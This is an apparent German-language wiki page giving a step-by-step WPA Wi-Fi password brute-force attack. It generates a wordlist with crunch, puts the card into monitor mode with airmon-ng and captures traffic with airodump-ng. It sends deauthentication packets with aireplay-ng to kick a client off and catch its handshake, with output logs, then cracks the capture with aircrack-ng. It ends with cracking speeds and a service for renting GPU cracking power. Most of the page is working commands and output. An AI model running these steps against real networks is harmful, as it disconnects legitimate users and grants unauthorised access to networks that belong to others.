Wlan Bruteforce Attacke
Version vom 14. Oktober 2020, 16:11 Uhr von Thomas.will (Diskussion | Beiträge) (→killen der problem prozesse)
vorgehen
- Passwort liste generieren
- Interface suchen
- Interface Monitor mode
- Prozesse die stören killen
- Wlans anzeigen
- capture AP
- auf Client Handshake warten (eventuell Verbindung killen)
- Brute Force auf Datei starten
- Erfolg
passwordlist generieren
- crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes 858 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 100000000 crunch: 19% completed generating output crunch: 38% completed generating output crunch: 58% completed generating output crunch: 76% completed generating output crunch: 95% completed generating output crunch: 100% completed generating output
stoppen von störenden Diensten
- systemctl stop avahi-daemon
- systemctl stop NetworkManager
list
- airmon-ng
PHY Interface Driver Chipset phy0 wlan0 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
echo INT=wlan0 >> data source data
monitor modus
- airmon-ng start $INT
checken
- airmon-ng check wlan1mon
No interfering processes found
- falls noch was gestartet
- systemctl stop avahi-daemon
- systemctl stop NetworkManager
dump
Wir suchen nach der BSSID von dd-wrt
- airodump-ng wlan1mon
handshake besorgen
- BSSIDSTADION=44:74:6C:54:68:E8 # Wird später gebraucht
- BSSIDAP=00:18:F8:DA:F7:94
- CHANNEL=6
- airodump-ng --bssid $BSSIDAP -c $CHANNEL -w wlan.cap wlan1mon
zweites fenster öffnen (sends deauthentication packets)
- BSSIDSTADION=44:74:6C:54:68:E8
- BSSIDAP=00:18:F8:DA:F7:94
- aireplay-ng -0 50 -a $BSSIDAP -c $BSSIDSTADION wlan1mon
11:02:39 Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel 6 11:02:39 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 4 ACKs] 11:02:40 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 6 ACKs] 11:02:40 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 8 ACKs] 11:02:41 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0| 7 ACKs] 11:02:44 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|43 ACKs] 11:02:49 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [36|68 ACKs] 11:02:55 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs] 11:03:00 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs] 11:03:05 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs] 11:03:10 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|64 ACKs] 11:03:15 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs] 11:03:21 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 4|65 ACKs] 11:03:26 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs] 11:03:32 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|61 ACKs] 11:03:37 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 3|65 ACKs] 11:03:42 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|63 ACKs] 11:03:47 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs] 11:03:52 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs] 11:03:57 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [26|67 ACKs] 11:04:02 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 2|65 ACKs] 11:04:07 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|63 ACKs] 11:04:12 Sending 64 directed DeAuth. STMAC: [44:74:6C:54:68:E8] [ 0|64 ACKs]
bis der client rausfliegt
nach dem wiederverbinden kommt der handshake
handshake
HANDSHAKE=00:18:F8:DA:F7:94
cracken
- aircrack-ng -w password.lst -b $BSSIDAP wlan.cap-01.cap
Crack geschwindigkeiten
Laptop Schaft circa 1000 Keys pro Sekunde
eine starke Grafikkarte (Titan XP) schaft 520000 hash/s
Bei bedarf kann man sich auch online Rechen power mieten
https://www.gpuhash.me/?menu=en-tasks
oder sich ein Cluster aus mehreren Grafikkarten bauen